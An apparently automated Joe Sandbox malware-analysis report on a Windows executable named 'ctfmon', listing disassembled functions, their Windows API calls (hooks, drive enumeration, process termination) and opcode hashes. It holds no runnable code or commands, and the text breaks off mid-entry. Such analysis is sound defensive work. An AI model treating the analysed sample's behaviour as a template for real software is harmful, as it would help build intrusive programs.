        • Opcode Fuzzy Hash: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
        • Instruction Fuzzy Hash: D7619471B00269DFCF10DFA4E8859BEBBB1BF18304F60046FF501A22A1D7785A51CB59

        Control-flow Graph

        APIs
        • __EH_prolog.LIBCMT ref: 00421D1C
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421D34
        • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 00421D92
          • Part of subcall function 00421924: GetWindowRect.USER32(?,00421B1C), ref: 00421949
          • Part of subcall function 00421924: GetWindow.USER32(?,00000004), ref: 00421966
        • SetWindowLongW.USER32(?,000000FC,?), ref: 00421DC2
        • RemovePropW.USER32(?,AfxOldWndProc423), ref: 00421DCA
        • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00421DD1
        • GlobalDeleteAtom.KERNEL32(00000000), ref: 00421DD8
          • Part of subcall function 00421901: GetWindowRect.USER32(?,?), ref: 0042190D
        • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00421E2C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
        • String ID: AfxOldWndProc423
        • API String ID: 2397448395-1060338832
        • Opcode ID: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
        • Instruction ID: ee617ac9c7a8cbdd772955139c2c3f47372abafb9f4b2e415b0651597c7a1178
        • Opcode Fuzzy Hash: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
        • Instruction Fuzzy Hash: 1831A572A0012ABBCF119FE5ED49DFF7B78EF55311F40042AF901A2160C7394A21D7A9

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 361 42889e-4288bb EnterCriticalSection 362 4288ca-4288cf 361->362 363 4288bd-4288c4 361->363 365 4288d1-4288d4 362->365 366 4288ec-4288f5 362->366 363->362 364 428983-428986 363->364 367 428988-42898b 364->367 368 42898e-4289af LeaveCriticalSection 364->368 369 4288d7-4288da 365->369 370 4288f7-428908 GlobalAlloc 366->370 371 42890a-428926 GlobalHandle GlobalUnlock GlobalReAlloc 366->371 367->368 372 4288e4-4288e6 369->372 373 4288dc-4288e2 369->373 374 42892c-428938 370->374 371->374 372->364 372->366 373->369 373->372 375 428955-428982 GlobalLock call 40e000 374->375 376 42893a-428950 GlobalHandle GlobalLock LeaveCriticalSection call 41fa5f 374->376 375->364 376->375
        APIs
        • EnterCriticalSection.KERNEL32(0000001C,0053EDA8,00000000,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 004288AD
        • GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 00428902
        • GlobalHandle.KERNEL32(?), ref: 0042890B
        • GlobalUnlock.KERNEL32(00000000), ref: 00428914
        • GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 00428926
        • GlobalHandle.KERNEL32(?), ref: 0042893D
        • GlobalLock.KERNEL32(00000000), ref: 00428944
        • LeaveCriticalSection.KERNEL32(0040D108,?,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 0042894A
        • GlobalLock.KERNEL32(00000000), ref: 00428959
        • LeaveCriticalSection.KERNEL32(?), ref: 004289A2
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
        • String ID:
        • API String ID: 2667261700-0
        • Opcode ID: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
        • Instruction ID: 271864d7abaf63b675c0f0faa4b004931e40b10b77f41b95d7dd058722d16705
        • Opcode Fuzzy Hash: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
        • Instruction Fuzzy Hash: 1E318EB17007099FD7249F28EC89A2EB7E9FF44304B440A2EF952C3661EB75E855CB54

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 427 423c3c-423c57 428 423c69 427->428 429 423c59-423c67 call 424202 427->429 431 423c6d-423c8b GetParent call 4203c0 428->431 429->428 429->431 435 423c8e-423c92 431->435 436 423c94-423ca1 PeekMessageW 435->436 437 423d0a-423d18 call 4203c0 435->437 436->437 439 423ca3-423ca7 436->439 452 423d1a-423d1e 437->452 453 423d7f-423d88 call 42ad92 437->453 441 423cbb-423cc0 439->441 442 423ca9-423cb7 call 424368 UpdateWindow 439->442 444 423cc2-423cc6 441->444 445 423ce1-423ce6 441->445 442->441 444->445 450 423cc8-423ccc 444->450 446 423d04-423d08 445->446 447 423ce8-423d02 SendMessageW 445->447 446->435 447->435 447->446 450->445 451 423cce-423cdb SendMessageW 450->451 451->445 454 423d43-423d4c 452->454 455 423d20-423d28 452->455 462 423d91-423d98 453->462 463 423d8a-423d8e 454->463 464 423d4e-423d5d call 4203c0 454->464 457 423d31-423d3f call 424368 UpdateWindow 455->457 458 423d2a-423d2f 455->458 457->454 458->454 458->457 463->462 469 423d6b-423d78 PeekMessageW 464->469 470 423d5f-423d67 464->470 469->437 471 423d7a 469->471 470->469 471->435
        APIs
        • GetParent.USER32(?), ref: 00423C70
        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423C99
        • UpdateWindow.USER32(?), ref: 00423CB5
        • SendMessageW.USER32(?,00000121,00000000,?), ref: 00423CDB
        • SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 00423CFA
        • UpdateWindow.USER32(?), ref: 00423D3D
        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423D70
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Message$Window$PeekSendUpdate$LongParent
        • String ID:
        • API String ID: 2853195852-0
        • Opcode ID: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
        • Instruction ID: 2835e03b91a28ba3af01524857fe71f7bc2e9977fd44adc23a2fdb3f1163188a
        • Opcode Fuzzy Hash: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
        • Instruction Fuzzy Hash: BE418F307047519BD731DF26A848A2BBBF8EFC4B46F90091EF48196251C77DDA05CA9A

        Control-flow Graph

        APIs
        • GetSystemMenu.USER32(?,00000000,?,?,?,?,0042AFB8,000000FF), ref: 00401265
        • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004012B3
        • AppendMenuW.USER32(?,00000000,00000010,?), ref: 004012C2
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004012EB
        • SendMessageW.USER32(?,00000080,00000000,?), ref: 004012FC
        • CreateThread.KERNEL32(00000000,00000000,Function_000014B0,00000000,00000000,00000000), ref: 0040133B
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Menu$AppendMessageSend$CreateSystemThread
        • String ID:
        • API String ID: 74173811-0
        • Opcode ID: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
        • Instruction ID: 1d9806d43d84ee879c0bed757a7013bebe0408e528fbc722d7d59c404b59acd4
        • Opcode Fuzzy Hash: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
        • Instruction Fuzzy Hash: E0215375340700BBE230DB55DC82F1AF7A4EB84B10F508A1EB6556B2D0CAB8F8058B59

        Control-flow Graph

        APIs
        • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00424DA5
        • GetSystemMetrics.USER32(0000000C), ref: 00424DAC
        • GetDC.USER32(00000000), ref: 00424DC5
        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00424DD6
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00424DDE
        • ReleaseDC.USER32(00000000,00000000), ref: 00424DE6
          • Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000002), ref: 00429006
          • Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000003), ref: 00429010
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
        • String ID:
        • API String ID: 1031845853-0
        • Opcode ID: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
        • Instruction ID: 1a237f0f63429e1a6939c80a8fc9a6691efaff51cb6deb2a72a08bbb0bfadc6e
        • Opcode Fuzzy Hash: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
        • Instruction Fuzzy Hash: 8EF03670740710AEE2306B769C89F1B77A4EF90795F51452EE601572D0CAB898468AA9

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 497 428847-428850 498 428852-428853 TlsFree 497->498 499 428859-42885e 497->499 498->499 500 428873-428878 499->500 501 428860-428871 call 428b13 499->501 503 428891-42889d DeleteCriticalSection 500->503 504 42887a-42888b GlobalHandle GlobalUnlock GlobalFree 500->504 501->500 504->503
        APIs
        • TlsFree.KERNEL32(00000000,?,?,00428D54,00000000,00000001), ref: 00428853
        • GlobalHandle.KERNEL32(?), ref: 0042887B
        • GlobalUnlock.KERNEL32(00000000), ref: 00428884
        • GlobalFree.KERNEL32(00000000), ref: 0042888B
        • DeleteCriticalSection.KERNEL32(-0000001C,?,?,00428D54,00000000,00000001), ref: 00428895
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
        • String ID:
        • API String ID: 2159622880-0
        • Opcode ID: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
        • Instruction ID: 3d5d1d7ecfedab2d5cc22e9364798e3d77b8a9c8052dba26925915cdb0ff854d
        • Opcode Fuzzy Hash: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
        • Instruction Fuzzy Hash: AFF09A357006209BC630AB69AC88A2F76A8AF847507C9056EF801D3261CF28DC028AA8
        APIs
        • CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00415A9B
        • GetLastError.KERNEL32 ref: 00415AA7
        • GetFileType.KERNEL32(00000000), ref: 00415ABC
        • CloseHandle.KERNEL32(00000000), ref: 00415AC7
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$CloseCreateErrorHandleLastType
        • String ID:
        • API String ID: 1809617866-0
        • Opcode ID: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
        • Instruction ID: aab0d4c648b5e97227a39ec10cf2ade21aae79614a35b9dda5638ec353018830
        • Opcode Fuzzy Hash: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
        • Instruction Fuzzy Hash: 598149B1918A45DBEF204B68CC847EF7B60AF81364F24422BE561A73D1C7BC49C5875E
        APIs
        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00412B60
        • GetLastError.KERNEL32 ref: 00412B6A
        • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00412C30
        • GetLastError.KERNEL32 ref: 00412C3A
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorFileLastRead
        • String ID:
        • API String ID: 1948546556-0
        • Opcode ID: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
        • Instruction ID: 7d164bf494c3a70b5ac177ea6f34f1a928856a788b915d1263595a35fc0a8096
        • Opcode Fuzzy Hash: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
        • Instruction Fuzzy Hash: 3551E7346043859FDF218F98C9807EE7BB0AF12304F54409BE951DB351E3B899E6CB99
        APIs
          • Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
          • Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5
        • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CEA
        • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CFF
        • LeaveCriticalSection.KERNEL32(00000068,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411D0C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$EnterInitialize$Leave
        • String ID:
        • API String ID: 713024617-3916222277
        • Opcode ID: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
        • Instruction ID: 13a2c4bc58f2d481d2e4a9d701e6eaf19ac6520ffe26352c078445bd6550f82f
        • Opcode Fuzzy Hash: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
        • Instruction Fuzzy Hash: BF3139725053019FD3148F20ECC47EA77E5EB41338F248A2EE6668B2E1D7B4A8C88759
        APIs
        • GetVersion.KERNEL32(?,?,?,00428FCF), ref: 0042904B
        • GetProcessVersion.KERNEL32(00000000,?,?,?,00428FCF), ref: 00429088
        • LoadCursorW.USER32(00000000,00007F02), ref: 004290B6
        • LoadCursorW.USER32(00000000,00007F00), ref: 004290C1
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CursorLoadVersion$Process
        • String ID:
        • API String ID: 2246821583-0
        • Opcode ID: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
        • Instruction ID: f2f89bb0e4747260c37c204fa35bc9d0ef2f952a0fe52942db453467d738cb5e
        • Opcode Fuzzy Hash: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
        • Instruction Fuzzy Hash: 33113DB1A107608FD7249F7A988452ABBE5FB487047804D3FE18BC6B51DB78E4418F54
        APIs
        • CloseHandle.KERNEL32(00000000,00000100,K[A,00411A8A,K[A,K[A,00000100,00000000,00415B4B,00000000), ref: 00411AEC
        • GetLastError.KERNEL32 ref: 00411AF6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseErrorHandleLast
        • String ID: K[A$K[A
        • API String ID: 918212764-3551647969
        • Opcode ID: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
        • Instruction ID: 6524854afac2a70c962223058db7ab38a219dab8095493e29c0a91285f7820d6
        • Opcode Fuzzy Hash: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
        • Instruction Fuzzy Hash: 8101A73361962056C62467B96C49EEB16644FC1375F25061FFB11D62F1EE2CA8C2815D
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: DriveDrivesLogicalType
        • String ID: %c:\
        • API String ID: 4038169723-3142399695
        • Opcode ID: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
        • Instruction ID: 5a5b2ba27494c355ef28315322f719edc421758644ed9a5ba6575820666cadf4
        • Opcode Fuzzy Hash: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
        • Instruction Fuzzy Hash: A701A7629406009AC3119B08E89175BBFD99BE4311F54853FE88467380D67B994A87A9
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 004203E8
        • SetWindowsHookExW.USER32(000000FF,0042072A,00000000,00000000), ref: 004203F8
          • Part of subcall function 00428C9A: __EH_prolog.LIBCMT ref: 00428C9F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentH_prologHookThreadWindows
        • String ID: 8qj
        • API String ID: 2183259885-1316662731
        • Opcode ID: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
        • Instruction ID: 6bcf5cd4f4f4ddade5c49cae69e891880ade3d052de22ae2a353e1a51ef8f9c9
        • Opcode Fuzzy Hash: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
        • Instruction Fuzzy Hash: 52F08231B02230ABD7203B71B95971D2AD0AF50715F9546AEF502975E2CE288841C76D
        APIs
        • GetCurrentProcess.KERNEL32(?,?,0040DD95,?,00000000,00000000,0040D111,00000000,00000000), ref: 0040DDBF
        • TerminateProcess.KERNEL32(00000000,?,0040DD95,?,00000000,00000000,0040D111,00000000,00000000), ref: 0040DDC6
        • ExitProcess.KERNEL32 ref: 0040DE47
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 46bcc9cf34b78cd556bcc2f226b93e199ccd779cc67d6353b7bac2a829c7045d
        • Instruction ID: eb2bae5a7c05ae0f05409ec2047d6a94e59a826244f4d5dc0da0c2d2b805d8bd
        • Opcode Fuzzy Hash: 46bcc9cf34b78cd556bcc2f226b93e199ccd779cc67d6353b7bac2a829c7045d
        • Instruction Fuzzy Hash: 1F010C32D047019AD6216FA9FC8561E7BA5AFA0714F20003FF140672E0CB78584DDB99
        APIs
        • Sleep.KERNEL32(00001388), ref: 00403C91
          • Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
          • Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
